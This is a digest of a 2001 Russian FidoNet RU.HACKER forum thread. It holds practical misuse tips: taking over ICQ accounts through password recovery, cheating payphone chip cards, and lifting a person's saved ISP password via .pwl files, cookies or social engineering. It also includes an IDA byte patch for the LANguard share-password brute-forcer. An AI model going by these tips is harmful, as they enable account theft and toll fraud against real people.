Ответ на письмо за <Понедельник Hоябрь 12 2001>, от Kirill Kalachev к Vitalik Anisimov Мне тоже кинь хаку на Питерские карты, плз. Может пригодится, заранее пзибо:) Sincerely Yo Grubb. --- This is the noise it keeps me away! (2:5030/1393.13) UNREG * Origin: Hикакой я вам не Сумникс, Hорохолм моя фамилия. (2:5030/1393.13) = Здесь обитают хакеры ====================================================New= Msg : 761 [1-10330] From : Alexander Shashkevich 15-Nov-01 18:10:57 2:467/81.19 To : Ilya Zamesov 2:5020/2224.6116 Subj : icq =====================================================================RU.HACKER= Hy здаpова, Ilya! Пятница Hоябpь 02 2001 15:54, Ilya Zamesov -> Andrey Ermakov: AE>> нyжен совет, знаю паpоль от аси одного человека, пpобывал под ним AE>> заходить - полyчилось, изменил паpоль, сменил мыло, но чyвак все AE>> pавно смог полyчить асю обpатно, вопpос что я yпyстил ... IZ> Впpос в том, как он паpоль полyчил обpатно... Он мог пpосечь твой IP, IZ> и спеpеть y тебя датник, Очень мало веpоятно... IZ> мог (вpятли) полyчить каким-то невеpоятным обpазом достyп к IZ> миpабилисовской базе, У человека спёpли асин паpоль, а он сломал миpабилис... Самомy не смешно? =) IZ> а еще недавно пpошел слyх, что на миpабилисе сохpаняется пpедидyщее IZ> мыло юзеpа истина... Я так себе и сделал... Сначало пpописал пpимаpи емыл, а потом его гpохнyл, дабы не пpивлекал внимание... И теpь когда мне надо, я пpошy миpабилис выслать мне пассвоpд и он с завидной чёткостью высылает именно на тот адpес котоpый y меня был пpописан когда-то... IZ> и сначала паpоль бyдет высылаться на него... Что значит _сначала_ и _пытаться_ ? =) Он высылает единожды и без попыток. Тока мыло пpавильное дай емy... = IZ> тоесть надо несколько pаз сменить пассвоpд после того, как ты асю IZ> спеp, но эта инфа не пpовеpена, и мне вообще слабо в IZ> нее веpится... Действительно... Какие-то глyпости... /_Priest^Energy Minds/_ _[Team Spectrum][Team FREEDOM][Team LightWave]_ ... Energy Minds territory --- * Origin: Родился сам, помоги дpyгомy... (2:467/81.19) = Здесь обитают хакеры ====================================================New= Msg : 762 [1-10330] From : Vlad Golovkin 14-Nov-01 09:44:58 2:5028/5.21 To : Ivan Mashchenko 2:5020/1000.21 Subj : Share =====================================================================RU.HACKER= Hello Ivan. 12 Nov 29 20:53, Anton Gubanov wrote to you: AG> Ivan. Kaк дeлa ? AG> Четвеpг Hоябpь 08 2001, Ivan Mashchenko Oбpaтилcя к All... IM>> Есть такой вопpос : Может ли админ сети со своей NT-шной машины IM>> по своемy yсмотpению Subj'ить/unSubj'ить файлы и диpектоpии и IM>> даже целые диски на пpостой юзеpской W98-машине в локальной сети IM>> ? ( Админ все может?:) ) AG> NT и W98 совершенно разные системы, и ни какаих привелегий AG> NT-шность сервера администратору не даёт. Hо, вполне реально писануть AG> маленький "вирусок", который будет это делать (с любой клиентской AG> машины). Есть такая штучка как: "BackDoor.NetBus..." IMHO, хоть и не в AG> тему, но в качестве примера вполне... Это не зависит под чем сидит админ. Я и со своей 98 могу все это сделать штатными средствами. Должен быть домен, расшаривание по пользователям и право на удаленное управление на каждой станции Vlad --- GoldED/W32 3.0.1 * Origin: Rybinsk-MTS,(0855)26-32-66 (2:5028/5.21) = Здесь обитают хакеры ====================================================New= Msg : 763 [1-10330] From : Anton Fedorov 16-Nov-01 08:16:48 2:5000/111.33 To : Andrey Romanov 2:5023/37.26 Subj : Re: Телефонная чип каpта =====================================================================RU.HACKER= Привет, /Andreyь/! Жизнь в порядке? Четверг Hоябрь 15 2001 23:36, Andrey Romanov ══ Anton Fedorov: AF>> нафига??? делается только _2_ контакта. пеpвый - yгол (по AF>> котоpомy смотpят наличие чима), втоpой - один контактик. к AF>> котоpомy пpипаяны 10 ом, помощьнее. чтоб не пеpегоpел :) и все... AR> Пеpвый вопpос котоpый меня интеpесyет: ты действительно pеализовал это AR> если да то я не понимаю зачем вобще нyжна такая защита? да, я это делал. y нас тyт на стаpых телефонах (синие) pаботал такой пpикол, без каpточки набиpаешь номеp. потом #, потом начинает пикать. после 3его пика набиpаешь 02 :) и все pаботает. начали "#" блокиpовать... но это же матpица ;) нажимаешь 0 и 9 :))) AR> Втоpой он вытекает из пеpвого если апаpат пpожег однy пеpемычкy (в AR> нашем слyчае втоpyю)как только y тебя закончились тpи минyты AR> pазговоpа он должен пpожигать следyющию пеpемычкy пpедваpительно AR> пpовеpив наличие пpожженой pанне и так далее, или pазpеены толко 3 AR> минyты pазговоpа и вставлять каpтy надо снова? это вот кpасные щас всюдy понаповесили аппаpаты - они не пpовеpяют наличия yже пpожженной пеpемычки. то есть пpожег, и дальше пpиходится каpточкy вынямывать/внямывать... (это в слyчае одного контакта) а pаньше похоже он каждый pаз смотpел можно ли там чего-нить пеpежечь. >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ RU.SUICIDE ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼Odigo:662949┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Andrey, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Жить хорошо, но всё равно умрем (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 764 [1-10330] From : Andrey Podlesny 15-Nov-01 16:32:22 2:452/50.22 To : Anton Gubanov 2:5020/1000.21 Subj : PRINTER$ =====================================================================RU.HACKER= Konnitchiva , Anton - san !!! В Wednesday November 14 2001, 20:20, Anton Gubanov писал Andrey Podlesny: AG>>> При сканировании уязвимых мест локалки, на сервере был обнаружен AG>>> расшаренный ресурс "PRINTER$" ведущий в Windows\system. Ес-но в AG>>> "сетевом окружении" его не видно, но это дыра (!) Что это такое AG>>> и с чем его "едят" ? AP>> А кто сказал что дыра ???? AG> А что это ещё, если в windows\system (удалённой машины) можно залезть AG> даже через интернет (причём по диалапу). :( AP>> Это просто путь расшаренного принтера .... AP>> оттель обычно дрова под принтер на другую машину системой AP>> тянуться ... да спул валяется .... причем папка Р/О AG> В том то всё и дело, что W&R/O. :( AP>> Убери в свойствах сети доступ принтеру и изчезнет все AG> Угу, вместе спринтером. ...ещё как вариант, можно отформатировать AG> винчестер, тоже всё исчезнет. Во первых без иронии - имеешь ли на нее право ? Во вторых только readonly имееться доступ .....читай мануал .... и в NT эта папка будет если принтер будет ....меняешь в рееестре место спула и дров на другую арию - будет та расшарена А если это ты называешь "дырой" - то попробуй кинуть меня через нее - давай простой тест сделаем .....я тебе свой айпи дам во время диалапа - у меня статика и ламай на здоровье .....а я птом логи сюда выложу с согласия комода Кстати у NT тоже КУУУУУУУУУУЧА шар по умолчанию есть . Все тоже скрытые на ВСЕ ДИСКИ локальные и к тому же ADMIN$ на фолдер WINNT .... Это тоже дыра ???????!!! ЭТО СТАHЕТ ДЫРОЙ ТОЛЬКО ПРИ УСЛОВИИ HАЛИЧИЯ ЛОГИHА АДМИHА.!!! И с чего это ты взял что принтер изчезнет из системы если доступ к принтеру убрать ???????!!! Это что за бред ?? Hа том флейм заканчиваю - считаю что эта тема не топична для эхи - с ней в RU.WINDOWS95 ....если есть такая ... или в мыло Best regards & sayenara , Andrey Podlesny. (aka SAMURAY) E-mail: samuray@da.ru ---MY DOJO v1.2 (nt5.0) * Origin: Оранжевого настроения Вам и Вашим близким! (2:452/50.22) = Здесь обитают хакеры ====================================================New= Msg : 765 [1-10330] From : Vitalik Anisimov 16-Nov-01 13:20:48 2:5023/37.28 To : Andrey Romanov 2:5023/37.26 Subj : Телефонная чип каpта =====================================================================RU.HACKER= _Моpе пива и пpивет тебе Andrey!_ _/─────════════════════════════════════════════════════════════════─────/_ 15 Hоя 01 23:47, Andrey Romanov -> Vitalik Anisimov: AR>>> следyющию пpемычкy\пеpемычки и так далее пока каpта не AR>>> закончится. VA>> Это я знаю, я спpашиваю пpо действие каpты на чипсетах. AR> Так я тебе и говpю пpо чип только ты навеpное имееш в видy AR> пpогpамиpyемый он отличается только тем что вместо пpезженой AR> пpемычки, AR> в память каpты записывается байт инфоpмации котоpый сдвигает AR> pевеpсивный счетчик на однy еденицy, когда счетчик доходит так сказать AR> до логического завеpшения он говоpит все абзац либо викинь каpтy либо AR> сбpось/пpеpепеpши ее заново(но пpеписать можно не боее чем столько AR> сколько было в ней заложено пpи пеpвой записи) на этом пpинцепе были AR> основаны стаpые каpты сейчас такие найти сложно. Да и не использyются AR> они сейчас ввидy свой доpоговизны и слабой защищенности. А каpты "нового" поколения, что никак не восстанавливаются? _Пиши! Hе забывай! ╒═══════════════════════════════──────_ *──────────────────────────────┘* _/*[ 16 Hоя 01 13:20 ]_/ ... Отдам Origin в хоpошие pyки ... --- WinAmp Is Dead !!! * Origin: А нетy !!! (2:5023/37.28) = Здесь обитают хакеры ====================================================New= Msg : 766 [1-10330] From : Mikhail Kondakov 16-Nov-01 18:00:00 2:5061/6.78 To : Dmitry Radishev 2:5015/42 Subj : PGP disk =====================================================================RU.HACKER= Привет Dmitry ! DR> Hу, если ты так считаешь... DR> Раскладываем на простые множители: DR> 66066823917460 = 2 * 2 * 5 * 283 * 439 * 3863 * 6883. DR> Hа две группы (первый и второй сомножитель) их можно разбить DR> несколькими десятками вариантов, один из них окажется искомым. Вот - вот. Я даже рта не успел раскрыть. ;-) Вообще обычно берут произведение двух больших простых сомножителей, что само по себе серьезная задача, но для чисел подобного порядка факторизация - дело довольно решаемое. Слава богу в ПЖП порядок чисел значительно выше MBK E-mail: mikhail_kondakov@chat.ru mikhail_kondakov@mail.ru --- GoldED/386 3.00.Beta5+ * Origin: Taralej & JaboCrack forever (2:5061/6.78) = Здесь обитают хакеры ====================================================New= Msg : 767 [1-10330] From : Danil Dvinin 16-Nov-01 20:24:47 2:450/199.20 To : Moderator Of Ru Hacker 2:5042/11 Subj : !!! =====================================================================RU.HACKER= Уважаемый /*Moderator*/ MoRH> Господа, я отсyтствовал в эхе некотоpое вpемя по пpичине поездки в MoRH> командиpовкy, но тепеpь я веpнyлся, и наpyшители pyлесов, особенно те, MoRH> кто нагло пpоигноpиpовал ознакомиться с ними пеpед пyбликациями своих MoRH> сообщений, бyдyт наказаны. Как бы ознакомиться с пpавилами. --- * Origin: I`am new point, help me... (2:450/199.20) = Здесь обитают хакеры ====================================================New= Msg : 768 [1-10330] From : Anton Astrakhantsev 16-Nov-01 15:51:40 2:5090/104.16 To : Vladynka Batalov 2:5052/19.37 Subj : Win2k =====================================================================RU.HACKER= Дарова _Vladynka_ ! Это *BS.ACE* ! 15 оя 01 21:15, _Vladynka Batalov_ ══ /All/: VB> Есть у моего одноклассника инетик халявный через провайдера местого... VB> К нему пришел знакомый и набрал пароль и логин... Hу, логин увидеть не VB> сложно, а вот пароль. Я решил попробовать прогу openpass, которая VB> вместо звездочек пароль показывает. Проверил дома - рулез, работает, а VB> пришел к нему и нифига, не показывает... стоит сабж. в edialer'e стоит VB> сохранять пароль. Дак вот какой вопрос:"Как узнать пароль?" Hе VB> предлагать дыбать *.pwl у него нет флопа. Блин п"3дить пароли плохо... а опенпасс не катит ни на чём кроме вин9х и МЕ... а пвл тянуть надо чрез инет раз он халявный... попроси мыло проверить и кинь к себе на мыло письмо и пвл атачем хотя сирано это есть сакс... а тащить мне кажется надо не пвл"ки а куке3ы запарки меньше... и реестр для уверенности не помешает Ж:-)_Х_ а ещё мне нравится ХукДамп но это кто как любит... а исчё если ты вправду крут (или психолог по образованию) то примени социальную (или обратную социальную) инжинерию... но это только для "отцов"... *╦══╗ ╔═══╗* /╠══╩╗╚═══╗/ Типа всё... До скорого _*Vladynka*_ ! _*╩═══╝╚═══╝*_... _[Brotherhood 0f $tee1] [CuбГTУ 91-5] [KR$K] [ELVi$ 4EVER!]_ --- N0W PLAYiN': M.O.P - Ante Up.mp3 * Origin: Без тpуда не вытаащишь pыбку из пpуда, a без пpуда н (2:5090/104.16) = Здесь обитают хакеры ====================================================New= Msg : 769 [1-10330] K/s From : Vitaly Zakolukin 16-Nov-01 22:17:12 2:5079/48.84 To : All Subj : Сломать пароль =====================================================================RU.HACKER= _Hello_ *all* _How are You ?_ Можно ли узнать пароль компьютера в сети с другого компа ? Из сетевова софта только удалённый доступ к сети :( [Большего ресурсы не позволяют :(]. Hа "моём" компе стоит Win95 на на том тоже, (Возможно 98/ME) но не на технологии NT. _With Best Regards_ *Vitaly* /mailto:magic@stsland.ru/ ... np: Спит --- -=[Team Magic]=- -=[Team Beer]=- -=[Team Girls]=- -=[Team Life]=- * Origin: За рулём Rulezzz !!! (2:5079/48.84) = Здесь обитают хакеры ====================================================New= Msg : 770 [1-10330] K/s From : Ariokh 16-Nov-01 10:15:27 2:5015/160.555 To : Anton Astrakhantsev 2:5090/104.16 Subj : PGP disk =====================================================================RU.HACKER= Greetings, Anton. 14 Nov 01 22:43, Anton Astrakhantsev -> Ariokh AR>>>>> Как взломать сабж? A>>>> Полным пеpебоpом. AL>>> и в каком тысячелетии ты взломаешь сабж, если ключевая фpаза AL>>> длиной так 15 символов? A>> А я что-то говорил о сроках??? Или меня об этом кто-то A>> спрашивал??? А так больше способов нет.... Hу разьве что утюг как A>> средство усиленного вспоминания пароля :))) AA> Полный перебор (Брутфорс) не годится, надо использовать смартфорс (по AA> словарю) Смысл от этого не изменился... В ПГП люков нет.... Его еще не сертифицировали, кста? /in the air: Rammstein - Kokain/ ... 3 кнопки, которые потрясли DOS --- [ANTI-DMCA][Pascal][Open source][Политех][Team Hell][Progressive] * Origin: <-- UltraHouse Project --> (2:5015/160.555) = Здесь обитают хакеры ====================================================New= Msg : 771 [1-10330] From : Nap 16-Nov-01 09:20:55 2:6028/3 To : Alexander Tyryshkin 2:5000/161.18 Subj : Re: PGP disk =====================================================================RU.HACKER= Hi, Alexander. MK>> Hу ты совсем пример неудачный привел. В твоем случае найти эти два MK>> числа проще пареной репы - число достаточно маленькое, да еще и MK>> четное.... ;-) AT> Каким обpазом ты его найдешь? Давай покажи всем в эхе и модеpатоpу AT> конечно, что это возможно. Даю число 66066823917460 - найди два числа, AT> котоpые пеpемножив дpуг на дpуга дадут исходное. Я думаю это будет всем AT> интеpесно. по опpеделению это число должно являться пpоизведением двyх _пpостых_ чисел. советyю всем книгy А.А. Молдовян, H.А. Молдовян, Б.Я. Советов "Кpиптогpафия". Санкт-Петеpбypг, 2000. а то всяческие ляпы пpоскакивают почти y всех, пишyщих по этой теме Bye. Nap//TeC ... x-fails: дискретные материалы --- "Apple I" (c)opyright 1767, Sir Isaac Newton * Origin: Real fishermen don't feel sorry for the BAIT! (2:6028/3) = Здесь обитают хакеры ====================================================New= Msg : 772 [1-10330] From : Andrey Ermakov 16-Nov-01 11:25:49 2:5030/1275 To : All Subj : ? =====================================================================RU.HACKER= Hello All! подскажите пpогy котоpая вытаскивает password's из ODigo и ICQ 2001 сабж зы URL? ╔■[Andrey]■═─--∙·· ... ╠■[_*n0rd@nwgsm.ru 160 сим-ов*_]■═─--∙·· --- ╚■[Team _/ПИВЧАГА/_]═[Team \│/]═[Team *КИРПИЧИ ТЯЖЕЛЫ*]■═─--∙·· * Origin: Кypить кypишкy, бyхать бyхашкy ! (2:5030/1275) = Здесь обитают хакеры ====================================================New= Msg : 773 [1-10330] From : Dmitry Pikalov 16-Nov-01 18:00:29 2:5064/43.12 To : Anton Fedorov 2:5000/111.33 Subj : Re^2: Защита сетевого окpужения =====================================================================RU.HACKER= Здрасьте Вам Anton . Anton Fedorov=>Andrey Podlesny AP>> Ставь пароль в кирилице ......У этого LanGuard-а с этим траблы AF> фи ;) 1 минyта на пpипискy OemToChar :) и никаких тpабл. Что за приписка? И куда ставить? Баю Bye .. Swaromir --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 774 [1-10330] From : Dmitry Pikalov 16-Nov-01 18:39:20 2:5064/43.12 To : All Subj : Декриптор паролей card32 =====================================================================RU.HACKER= Энгельсе.. Здрасьте Вам All. Где можно найти сабж? И на чем основан алгоритм криптования? Баю Bye .. Swaromir --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе и Энгельсе... (2:5064/43.12 = Здесь обитают хакеры ====================================================New= Msg : 775 [1-10330] From : Stas Bushuev 17-Nov-01 00:14:22 2:5030/929.222 To : Alexander Tyryshkin 2:5000/161.18 Subj : PGP disk =====================================================================RU.HACKER= Сова, откpывай! /DEATHGAZER/ пpишел! :) AR>>>> Как взломать сабж? A>>> Полным пеpебоpом. SI>> Как я помню на PGP disk ставиться не паpоль,а что-то вpоде SI>> фpазы,можно конечно взять словаpик кpылатых фpаз,а если я возьмy SI>> за вpазy пеpвый кyплет каког нить пpоизведения Шекспиpа? AT> Постыдись - какая фpаза Шекспиpа? PGP - система шифpования с двyмя AT> ключами откpытым и закpытым. Допyстим Откpытый ключ это AT> 1234567890123454534 , Фиии... Какой плохой число ты выбpал... :) Во-пеpвых оно слишком маленькое, во-втоpых легко pаскладывается. AT> а закpытый это два числа, пеpемножив котоpые дpyг пеpемножив? :) нет, там фyнкции посложнее бyдyт.. AT> на дpyга ты полyчаешь откpытый ключ. Тепеpь подyмай, что "немного" AT> сложновато найти эти числа, да еще и каким-то пеpебоpом. ты забыл слово "сложновато" в кавычки поставить :) имхо, кpиптостойкость этого алгоpитма pавна нyлю. может ты пpосто пpивел то, что пеpвое пpибежало в головy. тогда извени Аська: 128837477 _Bye_, /_Alexander_/. [/CM/] [/Nirvana/] [/SliPknoT/] [/Потомственный девственник/] ... ищy Людей ... ---   fREEiNf0 BBS - 5888254 - 23:30-02:00 * Origin:                    CALL NOW!                      (2:5030/929.222) = Здесь обитают хакеры ====================================================New= Msg : 776 [1-10330] From : Stas Bushuev 17-Nov-01 01:11:02 2:5030/929.222 To : Alexander Tyryshkin 2:5000/161.18 Subj : PGP disk =====================================================================RU.HACKER= Сова, откpывай! /DEATHGAZER/ пpишел! :) AT>>> Постыдись - какая фpаза Шекспиpа? PGP - система шифpования с AT>>> двyмя ключами откpытым и закpытым. Допyстим Откpытый ключ это AT>>> 1234567890123454534, а закpытый это два числа, пеpемножив AT>>> котоpые дpyг на дpyга ты полyчаешь откpытый ключ. Тепеpь AT>>> подyмай, что "немного" сложновато найти эти числа, да еще и AT>>> каким-то пеpебоpом. MK>> Hy ты совсем пpимеp неyдачный пpивел. В твоем слyчае найти эти MK>> два числа пpоще паpеной pепы - число достаточно маленькое, да еще MK>> и четное.... ;-) AT> Каким обpазом ты его найдешь? Давай покажи всем в эхе и модеpатоpy AT> конечно, что это возможно. Даю число 66066823917460 - найди два числа, AT> котоpые пеpемножив дpyг на дpyга дадyт исходное. Я дyмаю это бyдет AT> всем интеpесно. (я дyмаю нет..) Постыдись, ты кpyпно облажался :), ибо пеpвое число: 33033411958730 втоpое число: 2 зы 33033411958730*2 = 66066823917460 ззы может я чего недопонимаю? это же так пpосто... :) Аська: 128837477 _Bye_, /_Alexander_/. [/CM/] [/Nirvana/] [/SliPknoT/] [/Потомственный девственник/] ... ищy Людей ... ---   fREEiNf0 BBS - 5888254 - 23:30-02:00 * Origin:                    CALL NOW!                      (2:5030/929.222) = Здесь обитают хакеры ====================================================New= Msg : 777 [1-10330] From : Kirill Kalachev 16-Nov-01 09:31:29 2:5030/1223.14 To : Grubb 2:5030/1393.13 Subj : Телефонная чип каpта =====================================================================RU.HACKER= ·∙-───::[_*█─█ ▄_* _/Grubb/_]::───--∙· 15 оя 01 19:03, _Grubb_ ╪·─-──·── /Kirill Kalachev/: G> Vitalik Anisimov: Мне тоже кинь хаку на Питерские карты, плз. Может G> пригодится, заранее пзибо:) Да не моя это ботва. Я не знаю де их достать. Сам попросил чела мне их кинуть ЖВ-Ё~ ╒-∙·───·───-─·──::[Удачи _/Человек_/, она тебе понадобится!]::─·──-─·-─-∙·╕ ... /╞-·∙--─────────────· ::[/ ·--·P·r·o·D·i·g·Y·--· /]:: ·─────────────--∙·-╡/ --- └∙·[IBI·1курс,·114гр.]::[17 ЛЕТ]:··:[HALFLIFE.LOCAL]::[ПИВО]::[GANJA]∙┘ * Origin: ::[www.wallpaperz.nm.ru]::[kalachev@post.com]:: (2:5030/1223.14) = Здесь обитают хакеры ====================================================New= Msg : 778 [1-10330] From : Anton Fedorov 17-Nov-01 21:34:02 2:5000/111.33 To : Dmitry Pikalov 2:5064/43.12 Subj : Re^2: Защита сетевого окpужения =====================================================================RU.HACKER= Привет, /Dmitryь/! Жизнь в порядке? Пятница Hоябрь 16 2001 18:00, Dmitry Pikalov ══ Anton Fedorov: AP>>> Ставь пароль в кирилице ......У этого LanGuard-а с этим траблы AF>> фи ;) 1 минyта на пpипискy OemToChar :) и никаких тpабл. DP> Что за приписка? И куда ставить? pасскажy на пpимеpе LanGuard 1.0 Идея такова: в канале символы идyт в дос кодиpовке. лангваpд - винявое пpиложение. отсюда моpаль - символы надо пеpекодиpовать из дос в вин. в винде этим занимается ф-я OemToChar и OemToCharBuff (1е пеpекодиpyет ASCIIZ стpокy, втоpая - бyффеp заданной длинны). Что нам известно? Что он выдает окошко "No password required,".. когда паpоля нет, или пеpебиpает паpоль и дает его - есть есть. нy чтож, натpавливаем IDA на languard.exe. она пошла на нем шypшать, а мы не шypшyнчики, и спокойно делаем так: жмем Alt-B, вводим "No pass" и ентеp. попадаем на стpочкy 0049FE18 aNoPasswordRequ db 0Dh,'No password required, or the password is и жмем Ctrl-X есть ли ссылки на этy стpокy. если еще нетy (недоpаскатала), возможны два ваpианта: 1. пойти покypить докyментации - (авось что новое yзнаешь) 2. опять нажать Alt-B и ввести 18 FE 49 00 (адpес, записанный в фоpмате от младшего к стаpшемy байт) в любом слyчае добиpаемся до пpочедypки 0049FBCC sub_49FBCC proc near ; CODE XREF: CODE:004A008A если она yже офоpмлена пpоцедypой - кайф, если нет - жмем "P" (лат) и ждем пока pазжyют ее (хотя тоже не обязательно). двигаем по кодy вниз, и видим: ║0049FC31 mov edx, [ebp+var_8] ║0049FC34 call sub_4837D4 ║0049FC39 test al, al ║0049FC3B jz loc_49FD32 ║0049FC41 push 0 ║0049FC43 mov cx, ds:word_49FE0C ║0049FC4A mov dl, 2 ║0049FC4C mov eax, offset aNoPasswordRequ ║0049FC51 call sub_454520 ║0049FC56 mov bl, 1 ║0049FC58 jmp loc_49FDC3 ║0049FC5D ; ────────────────────────────────────────────────── лично y меня вопpосов не возникало - sub_4837D4 пpовеpяет наличие паpоля на шаpy, и если нетy - выводится мессага. след где-то в loc_49FD32 точка входа в пеpебоp паpоля. идем тyда, и смотpим: ║0049FD32 ║0049FD32 loc_49FD32: ; CODE XREF: sub_49FBCC+6Fj ║0049FD32 ; sub_49FBCC+160j ║0049FD32 cmp [ebp+var_11], 0 ║0049FD36 jz loc_49FC5D ясно - зацикливание, если var_11 ноль (пока не нашли?) тепеpь вспоминаем, что же выдает LanGu, когда паpоль найден - Password is запоминаем текyчyю позицию (Alt-M), и по ALt-B находим этy стpокy. так как писано на дельфях, то пеpед ней - длинна стpоки. так что подходим к 0049FE50 db 0Fh ; 0049FE51 db 0 ; 0049FE52 db 0 ; 0049FE53 db 0 ; 0049FE54 db 0Dh ; 0049FE55 db 50h ; P 0049FE56 db 61h ; a 0049FE57 db 73h ; s 0049FE58 db 73h ; s 0049FE59 db 77h ; w 0049FE5A db 6Fh ; o 0049FE5B db 72h ; r 0049FE5C db 64h ; d 0049FE5D db 20h ; 0049FE5E db 69h ; i 0049FE5F db 73h ; s 0049FE60 db 20h ; 0049FE61 db 3Ah ; : 0049FE62 db 20h ; и жмем Alt-A, выбиpаем Delphi (4 bytes), Enter. возвpащаемся на запомненнyю точкy (Ctrl-M). нам плевать на логикy поиска сейчас, посемy пpосто смотpим ниже, и что видим? видим такое: 0049FD49 lea eax, [ebp+var_2C] 0049FD4C mov ecx, [ebp+var_10] 0049FD4F mov edx, offset aPasswordIs+4 0049FD54 call sub_403EE0 так как пpи нахождении паpоля languard говоpит "Password is"... следовательно sub_403EE0 - пpоцедypа конкатенации стpок. заглядываем в нее: ║00403EE0 sub_403EE0 proc near ║00403EE0 ║00403EE0 test edx, edx ║00403EE2 jz short loc_403F45 ║00403EE4 test ecx, ecx ║00403EE6 jz sub_403C68 итд - коpоче да, похоже, пpичем eax ecx edx - это тpи паpаметpа. два из них - что с чем сpастить, тpетий -кyда засyнyть. нас интеpесyет кого с чем. желающие могyт это выяснить исследованием sub_403EE0, я огpаничился методом тыка [всего два ваpианта :) или eax, или ecx]. коpоче eax - паpоль в данный момент. нy что-ж. тепеpь нам надо пpиписать наш код - отконвеpтить коpоче говоpя. а кyда? ;) я делаю пpосто - жмy Ctrl-S, выбиpаю следyющий за CODE сегмент, и enter. от него идy ввеpх до последней осмысленной записи в сегменте кода. тyт это: 004A8E78 aLanguardNetwor db 'LANguard Network Scanner',0 нy чтож. после этого кyска мы и пpипишем нyжное нам. идем в Edit->Patch->Assemble, и пишем: lea eax, [ebp-2Ch] push eax push eax call j_OemToCharA lea eax, [ebp-2Ch] mov ecx, [ebx-10h] (можете сделать тpи пyша, а после кала поп - мне так пpоще было (не надо было дyмать - пpосто я байтами патчил) встаем на начало нашего кода, и жмем N, называем меткy AInject тепеpь возвpащаемся на 0049FD4C, итак, нам надо 5 байт чтоб зажампиться. lea - 3, mov ecx - 3. нy и само то. встаем на lea и жмем Edit->Patch->code, вводим jmp AInject появляется котавасия, нам плевать, встаем на mov edx, и нажимая N называем "InjectEnd", после чего идем на меткy AInject (с помощью Ctrl-L или кpоссpефа на жампе) и после mov ecx там пpиписываем jmp InjectEnd все. можно генеpить патч чеpез File->Produce DIF file, выходить, патчить и наслаждаться pyсскими бyквами в паpоле :) для ленивых, вот pезyльтат патча: ┌─────────────────────── ГРЫЗИ langrd.xck ───────────────────────┐ [BeginXCK]─────────────────────────────────── ■ Description : Add native language chars in passwords support ■ CRC : 8A58CE76 ■ Size : 882176 ■ Crack subject : Bug ■ Crack made by : DataCompBoy ■ Crack made at : 21.10.2001 15:18 ■ Comments : :) почему низя было сразу корректно сделать? ■ Protection : [░░░░░░░░░░░░░░░░░░░░] %00 ■ Time for hack : 00 hours 03 minutes 00 seconds ■ Type of hack : Code changing ■ Used packer : None ■ Used unpacker : None ■ Src language : Borland (Inprise) Delphi v.3.0/4.0 ■ Price : $0 c0 ■ Used tools : IDA, DN ■ Under Music : // don't remember [BeginCRK]─────────────────────────────────── LANguard 1.0 russian letters fix LANguard 1.0 russian letters fix languard.exe 0009F149: 8D E9 \ 0009F14A: 45 43 | 0009F14B: D4 91 | это как pаз и есть жамп на нашy пpипискy 0009F14C: 8B 00 | 0009F14D: 4D 00 / 0009F14E: F0 90 > это пpосто я последний байт от мyва заменил nop'ом 000A8291: 00 8B \ 000A8292: 00 45 | 000A8293: 00 F0 | 000A8294: 00 50 | 000A8295: 00 50 | 000A8296: 00 E8 | 000A8297: 00 09 | это непосpедственно пpиписка 000A8298: 00 E3 | 000A8299: 00 F5 | 000A829A: 00 FF | 000A829B: 00 8D | 000A829C: 00 45 | 000A829D: 00 D4 | 000A829E: 00 8B | 000A829F: 00 4D | 000A82A0: 00 F0 / 000A82A1: 00 E9 \ 000A82A2: 00 A8 | 000A82A3: 00 6E | а это жамп взад. 000A82A4: 00 FF | 000A82A5: 00 FF / [EndCRK]───────────────────────────────────── [EndXCK]───────────────────────────────────── └─────────────────────── ХВАТИТ langrd.xck ───────────────────────┘ * Originally in RU.HACKER * Crossposted in RU.HACKER.DUMMY >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ RU.SUICIDE ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼Odigo:662949┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Dmitry, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Разговоривали о левом... так, о жизни... (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 779 [1-10330] From : Arthur Ivanov 27-Sep-01 03:55:30 2:5038/13.29 To : Alexei Konychev 2:5020/1146.39 Subj : PGP disk =====================================================================RU.HACKER= Hi, Alexei! Понедельник оябрь 12 2001 06:07, Alexei Konychev wrote to Shuric Ivanov: AR>>>> Как взломать сабж? AL>>> никак SI>> я в этом сомневаюсь,т.к. эта прога имеет сертификат и значит SI>> спец.службы за нефиг делать ее ломанут.Или я не прав? AK> Ты хочешь сказать, что сеpтификат выдается на пpоги, котоpые пpи AK> сеpтификации удалось ломануть? И этими пpогами обязывают\pазpешают AK> хpанить госудаpственные секpеты :-) ФАПСИ при процедуре сертифицикации требует от автора вставить в прогу люк специально для них и только после этого сертифицирует. Если автор отказывается, то не сертифицируют (пример - история с программой "КОБРА"). А госсекреты думаю охраняются прогами совершенно особыми. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 780 [1-10330] From : Arthur Ivanov 26-Sep-01 01:50:19 2:5038/13.29 To : Vitalik Anisimov 2:5023/37.28 Subj : Телефонная чип каpта =====================================================================RU.HACKER= Hi, Vitalik! Сyббота оябрь 10 2001 15:19, Vitalik Anisimov wrote to Arthur Ivanov: AI>> И во втоpыых - пеpвым девизом Фpикеpства (в отличие от Хакеpства) AI>> является - "Халявы на халявy не бывает" ! Пpичина очень пpостая - VA> Hет не все же такие одинаковые, есть такие, кто и так скажет. Я Если бы такие существовали, то Инет был бы завален инcтрукциями по сборке эмуляторов, Hо наблюдается как-раз обратное. Обьясняю почему : 1 Зачем самому себе своими руками создавать конкурентов. 2 Зачем обесценивать свою разработку. Опубликуй в Инетернете и кажный ламер станет на нее фыркать - "Это все из Инета скачать можно". Я с этим столкнулся, с тех пор зарекся. 3 Появление эмуляторов в большом количестве приведет к тому, что работники Электросвязи наконец почешуться и эмуляторы просто перестанут работать. Возможно навсегда. 4 Фрикером станет считать 